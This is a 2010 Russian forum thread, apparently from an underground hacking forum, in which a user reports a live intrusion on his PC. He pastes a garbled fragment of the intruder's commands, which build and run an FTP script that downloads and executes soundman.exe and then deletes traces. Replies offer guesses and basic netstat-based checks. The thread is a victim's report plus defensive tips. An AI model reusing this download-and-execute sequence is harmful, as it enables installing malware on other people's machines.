такая вот хуйня

abckizaru · Jul 3, 2010

Сидел вчера, не кого не трогал вбивал.
И тут давай браузер зум менять, и выдавать что то необычное.
Сижу смотрю что дальше, и тут давай в браузер писатся айпи и какие то команды, я быстрее закрыл.
Открыл блакнот с картоном, и туда кто то очень быстро начал писать вот это.
В самый конец как порядочно
ser 7778 25796 .. eq 7echo get soundman.exe .. eq 7echo quit .. eq 7ftp -n -s;eq 7soundman.exe 7del eq
Видно что не успели дописать, тот кто писал очень сильно торопился
Что это вообще за хуйня, отдел к?))

lord · Jul 3, 2010

Точно сказать не могу, но возможен вариант, что ты попал на связку сплойтов которая пробивает процесс soundman.exe.

eq 7ftp -n -s;

Вот это похоже на то, что на компе поднимали ftp =\

abckizaru · Jul 3, 2010

спасибо плюсик поставил
да и в браузере что то писали типо такой команды

thefloyd · Jul 3, 2010

Возмужно у тебя открыт порт 3389
Возможно тебя сбрутили как дедик.

Точно не отдел к.
У них методы посложнее

ismcard · Jul 5, 2010

сори что влез а какие у отдела к методы опишите вкраце чтоб понимать если не сложно

Aels · Jul 5, 2010

ректальная криптография, и задержания торговцев порнушкой контрафактной на митинке.
вот и все методы.

обычно все-таки обэпу сдают такую работу.

а про чудеса с компом - поздравляю, ты почти стал соксом)
но видимо лоадер скосячил где-то.

cosanostra777 · Jul 5, 2010

Офтоп но я бы упал на измену)

h0h0l · Jul 5, 2010

в такой ситуации сразу отрубаем инет, дальше не торопясь читаем и, если непонятно, гуглим - что там незваный гость писал. после этого, как правило, дальнейший план действий проще определить.

greenstar · Jul 5, 2010

ну и проверь свой комп на предмет наличия всяких радминов, и внц)

abckizaru · Jul 5, 2010

нет такого нечего

он писал а я стирал то что он пишет

comm1x · Jul 6, 2010

в середине очередного рабочего вечера пробей что-нибудь типа "netstat -a > c:\1.txt" и потом покури подумай, что лишнее открыто и через что тебя могли прослушать

---------- Сообщение добавлено в 02:58 ---------- Предыдущее сообщение размещено в 02:54 ----------

если найдешь трой то пробей с атрибутами -o -b -v, там уже найдешь того кто слушает.. пс: с этими атрибутами команда выполняется около минуты, так что не торопись закрывать командер

sergeyich · Jul 6, 2010

А как узнать что как? Файлик создало, но как узнать что там куда маячит или нет.

comm1x · Jul 6, 2010

смотри какие порты открыты, открыты ли они в другое время, скажем после 10 минут запуска компа... что эти порты значат.. а с -обв ты узнаешь какой файл открыл этот порт... так например я вчера узнал что мой кип инфиум делает запросы к одному порносайту, кому интересно antares.relax.ru:5222 - болезнь всех кипов

такая вот хуйня

abckizaru

Professional

lord

Vendor of:,  Scans Service

abckizaru

abckizaru

Professional

cosanostra777

thefloyd

Professional

ismcard

Professional

Aels

VIP member

cosanostra777

Professional

h0h0l

Professional

greenstar

UNRESOLVED PROBLEMS

abckizaru

Professional

comm1x

VIP member

sergeyich

Professional

comm1x

VIP member

Similar threads

такая вот хуйня

Professional

Vendor of:, &nbsp;Scans Service

Professional

Professional

Professional

VIP member

Professional

Professional

UNRESOLVED PROBLEMS

Professional

VIP member

Professional

VIP member

Similar threads

Vendor of:, Scans Service